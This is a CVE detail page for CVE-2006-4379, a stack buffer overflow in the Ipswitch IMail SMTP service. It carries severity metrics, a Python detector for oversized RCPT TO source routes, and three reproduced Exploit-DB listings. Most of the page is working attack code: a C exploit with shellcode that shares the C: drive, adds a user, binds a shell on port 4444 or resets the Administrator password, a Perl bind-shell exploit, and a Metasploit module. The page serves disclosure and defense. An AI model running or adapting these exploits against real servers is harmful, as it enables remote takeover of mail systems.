CVE-2006-4379 : Detail

CVE-2006-4379

93.56%V3
Network
2006-09-08
19h00 +00:00
2018-10-17
18h57 +00:00

CVE Descriptions

Stack-based buffer overflow in the SMTP Daemon in Ipswitch Collaboration 2006 Suite Premium and Standard Editions, IMail, IMail Plus, and IMail Secure allows remote attackers to execute arbitrary code via a long string located after an '@' character and before a ':' character.
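Added example (not part of the CVE record or of the exploit listings further down this page): a detection check that a mail gateway or log pipeline could run over raw SMTP command lines, flagging RCPT TO source routes (the part after '@' and before ':') that are oversized or contain non-hostname bytes. The function names, finding labels and sample lines are constructed for illustration; the 512- and 255-octet limits are the RFC 5321 command-line and domain limits.

```python
import re

# RFC 5321 section 4.5.3.1 size limits, in octets.
MAX_COMMAND_LINE = 512   # whole command line, CRLF included
MAX_DOMAIN = 255         # a single domain name

# "RCPT TO:<@route:mailbox>" -- capture what sits between "<@" and the first ':'.
_RCPT_ROUTE = re.compile(
    rb"^\s*RCPT\s+TO:\s*<@(?P<route>[^:>\r\n]*)(?P<sep>:?)", re.IGNORECASE
)
# Bytes a legitimate source route ("a.example,@b.example") can contain.
_ROUTE_BYTES = re.compile(rb"[A-Za-z0-9.\-,@]*")


def inspect_smtp_line(line: bytes) -> list:
    """Return finding labels (hypothetical names) for one raw SMTP command line."""
    findings = []
    if len(line) > MAX_COMMAND_LINE:
        findings.append("command-line-too-long")
    m = _RCPT_ROUTE.match(line)
    if m and m.group("sep"):
        route = m.group("route")
        if len(route) > MAX_DOMAIN:
            findings.append("source-route-too-long")
        if not _ROUTE_BYTES.fullmatch(route):
            findings.append("source-route-bad-bytes")
    return findings


def scan_session(lines) -> list:
    """Return (index, findings) for every line in a session that raised a finding."""
    hits = []
    for i, line in enumerate(lines):
        found = inspect_smtp_line(line)
        if found:
            hits.append((i, found))
    return hits


# Constructed sample session: filler bytes only, no real payload or address.
SAMPLE_SESSION = [
    b"EHLO client.example.org\r\n",
    b"MAIL FROM:<alice@example.org>\r\n",
    b"RCPT TO:<@relay.example.net:bob@example.com>\r\n",     # legitimate source route
    b"RCPT TO: <@" + b"A" * 600 + b":bob@example.com>\r\n",  # oversized route
    b"RCPT TO: <@\xde\xad\xbe\xef:" + b"B" * 40 + b">\n",     # binary bytes in route
]

if __name__ == "__main__":
    for index, found in scan_session(SAMPLE_SESSION):
        print(index, found)
```

The byte-class check matters as much as the length checks: a route that is only a few bytes long but is not hostname text is still anomalous.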

CVE Information

Metrics

Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.5 | | AV:N/AC:L/Au:N/C:P/I:P/A:P | nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0% and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs according to their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of other CVEs. The percentile thus compares the EPSS score of one CVE with that of the others.

Exploit information

Exploit Database EDB-ID : 2601

Publication date : 2006-10-18 22h00 +00:00
Author : Greg Linares
EDB Verified : Yes

// IMail 2006 and 8.x SMTP Stack Overflow Exploit // coded by Greg Linares [glinares.code[at]gmail[dot]com // http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html // This works on the following versions: // 2006 IMail prior to 2006.1 update #include <stdio.h> #include <string.h> #include <windows.h> #include <winsock.h> #pragma comment(lib,"wsock32.lib") int main(int argc, char *argv[]) { static char overflow[1028]; // PAYLOADS // Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More) /* win32_exec - EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */ unsigned char RootShare[] = "\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58" "\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46" "\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69" "\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89" "\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62" "\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34" "\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c" "\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5" "\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac" "\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc" "\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26" "\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad"; /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */ unsigned char Win32Bind[] = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93" "\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9" "\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd" "\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf" "\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e" "\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd" 
"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd" "\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66" "\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6" "\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34" "\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65" "\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7" "\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e" "\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f" "\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61" "\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66" "\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b" "\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9" "\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67" "\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6" "\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69" "\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; /* win32_adduser - PASS=Error EXITFUNC=seh USER=Error Size=236 Encoder=PexFnstenvSub http://metasploit.com */ unsigned char AddUser[] = "\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2" "\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f" "\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23" "\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67" "\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c" "\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e" "\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1" "\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02" "\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e" "\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f" "\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18" "\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c" 
"\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a" "\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f" "\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a"; /* win32_exec - CMD=net user Administrator "p@ssw0rd" Size=187 Encoder=Pex http://metasploit.com */ unsigned char ChangeAdmin[] = "\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74" "\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff" "\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3" "\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7" "\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc" "\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e" "\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31" "\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2" "\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe" "\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf" "\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba"; WSADATA wsaData; struct hostent *hp; struct sockaddr_in sockin; char buf[300], *check; int sockfd, bytes; int plen, i, JMP; char *hostname; unsigned short port; printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow Exploit\n"); printf("Coded by Greg Linares < glinares.code [at] GMAIL [dot] com >\n"); if (argc <= 1) { printf("Usage: %s [hostname] [port] <Payload> <JMP>\n", argv[0]); printf("Default port is 25 \r\n"); printf("==============================\n"); printf("Payload Options: 1 = Default\n"); printf("==============================\n"); printf("1 = Share C:\\ as 'Export' Share\n"); printf("2 = Add User 'Error' with Password 'Error'\n"); printf("3 = Win32 Bind CMD to Port 4444\n"); printf("4 = Change Administrator Password to 'p@ssw0rd'\n"); printf("==============================\n"); printf("JMP Options: 1 = Default\n"); printf("==============================\n"); printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 
0x10036f71 \n"); printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af \n"); printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret] 0x77d02289 \n"); printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 \n"); printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp, ret] 0x71ab389c \n"); printf("6 = Win2000 Universal English USER32.DLL [pop ebp, ret] 0x75021397 \n"); printf("7 = Win2000 Universal French USER32.DLL [pop ebp, ret] 0x74fa1397 \n"); printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop ebp, ret] 0x77d18c14 \r\n"); exit(0); } hostname = argv[1]; if (argv[2]) port = atoi(argv[2]); else port = atoi("25"); if (argv[4]) JMP = atoi(argv[4]); else JMP = atoi("1"); if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) { fprintf(stderr, "Error setting up with WinSock v1.1\n"); exit(-1); } hp = gethostbyname(hostname); if (hp == NULL) { printf("ERROR: Uknown host %s\n", hostname); printf("%s",hostname); exit(-1); } sockin.sin_family = hp->h_addrtype; sockin.sin_port = htons(port); sockin.sin_addr = *((struct in_addr *)hp->h_addr); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) { printf("ERROR: Socket Error\n"); exit(-1); } if ((connect(sockfd, (struct sockaddr *) &sockin, sizeof(sockin))) == SOCKET_ERROR) { printf("ERROR: Connect Error\n"); closesocket(sockfd); WSACleanup(); exit(-1); } printf("Connected to [%s] on port [%d], sending overflow....\n", hostname, port); if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) { printf("ERROR: Recv Error\n"); closesocket(sockfd); WSACleanup(); exit(1); } /* wait for SMTP service welcome*/ buf[bytes] = '\0'; check = strstr(buf, "220"); if (check == NULL) { printf("ERROR: NO response from SMTP service\n"); closesocket(sockfd); WSACleanup(); exit(-1); } // JMP to EAX = Results in a Corrupted Stack // so instead we POP EBP, RET to restore pointer and then return // this causes code procedure to continue /* ['IMail 8.x Universal', 0x10036f71 ], ['Windows 2003 SP1 English', 
0x7c87d8af ], ['Windows 2003 SP0 English', 0x77d5c14c ], ['Windows XP SP2 English', 0x7c967e23 ], ['Windows XP SP1 English', 0x71ab389c ], ['Windows XP SP0 English', 0x71ab389c ], ['Windows 2000 Universal English', 0x75021397 ], ['Windows 2000 Universal French', 0x74fa1397], ['Windows XP SP1 - SP2 German', 0x77d18c14], */ char Exp[] = "RCPT TO: <@"; // This stores our JMP between the @ and : char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English NTDLL.DLL [pop ebp, ret] 0x7c967e23 char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15 SMTPDLL.DLL [pop ebp, ret] 0x10036f71 char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23 char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0 English U32 [pop ebp, ret]0x71ab389c char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs [pop ebp, ret]0x75021397 char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except French Win2k [pop ebp, ret]0x74fa1397 char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2 German U32 [pop ebp, ret]0x77d18c14 char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any characters work. // Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems // After around 560 bytes or so EIP gets overwritten. But this method is easier to exploit and it works // On all versions from 8.x to 2006 (9.x?) char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize Stack prior to payload. 
memset(overflow, 0, 1028); strcat(overflow, Exp); if (JMP == 1) { printf("Using IMail 8.15 SMTDP.DLL JMP\n"); strcat(overflow, IMail815); } else if (JMP == 2) { printf("Using Win2003 SP1 NTDLL.DLL JMP\n"); strcat(overflow, Win2k3SP1E); } else if (JMP == 3) { printf("Using Win2003 SP0 USER32.DLL JMP\n"); strcat(overflow, Win2k3SP0E); } else if (JMP == 4) { printf("Using WinXP SP2 NTDLL.DLL JMP\n"); strcat(overflow, WinXPSP2E); } else if (JMP == 5) { printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n"); strcat(overflow, WinXPSP1); } else if (JMP == 6) { printf("Using Win2000 Universal English USER32.DLL JMP\n"); strcat(overflow, Win2KE); } else if (JMP == 7) { printf("Using Win2000 Universal French USER32.DLL JMP\n"); strcat(overflow, Win2KF); } else if (JMP == 8) { printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n"); strcat(overflow, WinXPG); } else { printf("Using IMail 8.15 SMTDP.DLL JMP\n"); strcat(overflow, IMail815); } // Setup Payload Options if (atoi(argv[3]) == 1) { printf("Using Root Share Payload\n"); plen = 544 - ((strlen(RootShare) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, RootShare); } else if (atoi(argv[3]) == 2) { printf("Using Add User Payload\n"); plen = 544 - ((strlen(AddUser)+ strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, AddUser); } else if (atoi(argv[3]) == 3) { printf("Using Win32 CMD Bind Payload\n"); plen = 544 - ((strlen(Win32Bind) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, Win32Bind); } else if (atoi(argv[3]) == 4) { printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\n"); plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, ChangeAdmin); } else { printf("Using Win32 CMD Bind Payload\n"); plen = 544 - ((strlen(Win32Bind) + 
strlen(StackS))); for (i=0; i<plen; i++){ strcat(overflow, "\x90"); } strcat(overflow, StackS); strcat(overflow, Win32Bind); } // Dont forget to add the trailing characters to set up stack overflow strcat(overflow, tail); // Connect to SMTP Server and Setup Up Email char EHLO[] = "EHLO \r\n"; char MF[] = "MAIL FROM <TEST@TEST> \r\n"; send(sockfd, EHLO, strlen(EHLO), 0); Sleep(1000); send(sockfd, MF, strlen(MF), 0); Sleep(1000); if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR) { printf("ERROR: Send Error\n"); closesocket(sockfd); WSACleanup(); exit(-1); } printf("Exploit Sent.....\r\n"); if (atoi(argv[3]) == 3) { printf("Check Shell on Port 4444\n"); closesocket(sockfd); WSACleanup(); exit(0); } printf("Checking If Exploit Executed....\r\n"); Sleep(1000); closesocket(sockfd); sockin.sin_family = hp->h_addrtype; sockin.sin_port = htons(port); sockin.sin_addr = *((struct in_addr *)hp->h_addr); if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR) { printf("ERROR: Socket Error\n"); exit(-1); } if ((connect(sockfd, (struct sockaddr *) &sockin, sizeof(sockin))) == SOCKET_ERROR) { printf("Exploit Successfully Delivered!\n"); closesocket(sockfd); WSACleanup(); printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); exit(0); } printf("..."); if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) { printf("Exploit Successfully Delivered!\n"); closesocket(sockfd); WSACleanup(); printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); exit(0); } /* wait for SMTP service welcome*/ buf[bytes] = '\0'; check = strstr(buf, "220"); if (check == NULL) { printf("Exploit Successfully Delivered!\n"); closesocket(sockfd); WSACleanup(); printf("Don't Forget to Restart the IMAIL SMTP Service to Re-exploit!"); exit(0); } printf("Exploit Failed: Try A different JMP Method or Payload\n"); closesocket(sockfd); WSACleanup(); exit (1); } // milw0rm.com [2006-10-19]
Exploit Database EDB-ID : 3264

Publication date : 2007-02-03 23h00 +00:00
Author : Jacopo Cervini
EDB Verified : Yes

#!/usr/bin/perl # http://www.zerodayinitiative.com/advisories/ZDI-06-028.html # https://www.securityfocus.com/bid/19885 # # acaro [at] jervus.it use IO::Socket::INET; use Switch; if (@ARGV < 3) { print "--------------------------------------------------------------------\n"; print "Usage : Imail-rcpt-overflow.pl -hTargetIPAddress -oTargetReturnAddress\n"; print " Return address: \n"; print " o1 - IMail 8.12 Version\n"; print " o2 - IMail 8.10 Versio\n"; print " Example for IMail 8.12 Version: ./Imail-rcpt-overflow.pl -h127.0.0.1 -o1 \n"; print "--------------------------------------------------------------------\n"; } use IO::Socket::INET; my $host = 10.0.0.2; my $port = 25; my $reply; my $request; my $happystack="\x81\xc4\xff\xef\xff\xff\x44"; foreach (@ARGV) { $host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/); $eip = $1 if ($_=~/-o(.*)/); } switch ($eip) { case 1 { $eip="\xc4\x91\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.12 case 2 { $eip="\xc3\x88\x01\x10" } # pop eax ret in SmtpDLL.dll for IMail 8.10 } # win32_bind - EXITFUNC=seh LPORT=4444 my $shellcode = "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93". "\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9". "\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd". "\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf". "\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e". "\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd". "\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd". "\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66". "\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6". "\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34". "\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65". "\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7". "\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e". 
"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f". "\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61". "\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66". "\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b". "\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9". "\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67". "\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6". "\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69". "\xc0\x84\x6b\xc9\x43\x7b\xbd\x36"; my $nop="\x41"x137; my $buffer = "RCPT TO:"."\x20\x3c\x40".$eip . "\x3a" .$nop.$happystack.$shellcode."\x4a\x61\x63\x3e"."\n"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "EHLO " . "\r\n"; send $socket, $request, 0; print "[+] Sent EHLO\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n"; send $socket, $request, 0; print "[+] Sent MAIL FROM\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = $buffer; send $socket, $request, 0; print "[+] Sent malicius request\n"; close $socket; print " + connect on port 4444 of $host ...\n"; sleep(3); system("telnet $host 4444"); exit; # milw0rm.com [2007-02-04]
Exploit Database EDB-ID : 3265

Publication date : 2007-02-03 23h00 +00:00
Author : Jacopo Cervini
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::imail_smtp_rcpt_overflow; use base "Msf::Exploit"; use strict; use Pex::Text; my $advanced = { }; my $info = { 'Name' => 'IMail 2006 and 8.x SMTP Stack Overflow Exploit', 'Version' => '$Revision: 1.0 $', 'Authors' => [ 'Jacopo Cervini <acaro [at] jervus.it>', ], 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'], 'Priv' => 1, 'UserOpts' => { 'RHOST' => [1, 'ADDR', 'The target address'], 'RPORT' => [1, 'PORT', 'The target port', 25], 'Encoder' => [1, 'EncodedPayload', 'Use Pex!!'], }, 'AutoOpts' => { 'EXITFUNC' => 'seh' }, 'Payload' => { 'Space' => 400, 'BadChars' => "\x00\x0d\x0a\x20\x3e\x22\x40", 'Keys' => ['+ws2ord'], }, 'Description' => Pex::Text::Freeform(qq{ This module exploits a stack based buffer overflow in IMail 2006 and 8.x SMTP service. 
If we send a long strings for RCPT TO command contained within the characters '@' and ':' we can overwrite the eip register and exploit the vulnerable smpt service }), 'Refs' => [ ['BID', '19885'], ['CVE', '2006-4379'], ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-06-028.html'], ], 'Targets' => [ ['Universal IMail 8.10',0x100188c3 ], # pop eax, ret in SmtpDLL.dll for IMail 8.10 ['Universal IMail 8.12',0x100191c4 ], # pop eax, ret in SmtpDLL.dll for IMail 8.12 ], 'DefaultTarget' => 0, 'Keys' => ['smtp'], 'DisclosureDate' => 'September 7 2006', }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $target_host = $self->GetVar('RHOST'); my $target_port = $self->GetVar('RPORT'); my $target_idx = $self->GetVar('TARGET'); my $shellcode = $self->GetVar('EncodedPayload')->Payload; my $target = $self->Targets->[$target_idx]; my $ehlo = "EHLO " . "\r\n"; my $mail_from = "MAIL FROM:" . "\x20" . "\x3c"."acaro". "\x40"."jervus.it" . "\x3e" . "\r\n"; my $pattern = "\x20\x3c\x40"; $pattern .= pack('V', $target->[1]); $pattern .="\x3a" . $self->MakeNops((0x1e8-length ($shellcode))); $pattern .= $shellcode; $pattern .= "\x4a\x61\x63\x3e"; my $request = "RCPT TO: " . $pattern ."\n"; $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using pop eax, ret at 0x%.8x...", $target->[1])); my $s = Msf::Socket::Tcp->new ( 'PeerAddr' => $target_host, 'PeerPort' => $target_port, 'LocalPort' => $self->GetVar('CPORT'), 'SSL' => $self->GetVar('SSL'), ); if ($s->IsError) { $self->PrintLine('[*] Error creating socket: ' . 
$s->GetError); return; } my $r = $s->Recv(-1, 5); $s->Send($ehlo); $self->PrintLine("[*] I'm sending ehlo command"); $self->PrintLine("[*] $r"); sleep(2); $s->Send($mail_from); $self->PrintLine("[*] I'm sending mail from command"); $r = $s->Recv(-1, 10); $self->PrintLine("[*] $r"); sleep(2); $s->Send($request); $self->PrintLine("[*] I'm sending rcpt to command"); sleep(2); return; } # milw0rm.com [2007-02-04]

Products Mentioned

Configuration 0

Ipswitch>>Imail_plus >> Version 2006

Ipswitch>>Imail_secure_server >> Version 2006

Ipswitch>>Ipswitch_collaboration_suite >> Version 2006_premium

Ipswitch>>Ipswitch_collaboration_suite >> Version 2006_standard

References

http://secunia.com/advisories/21795
Tags : third-party-advisory, x_refsource_SECUNIA
http://securitytracker.com/id?1016804
Tags : vdb-entry, x_refsource_SECTRACK
http://www.securityfocus.com/bid/19885
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1016803
Tags : vdb-entry, x_refsource_SECTRACK
http://www.vupen.com/english/advisories/2006/3496
Tags : vdb-entry, x_refsource_VUPEN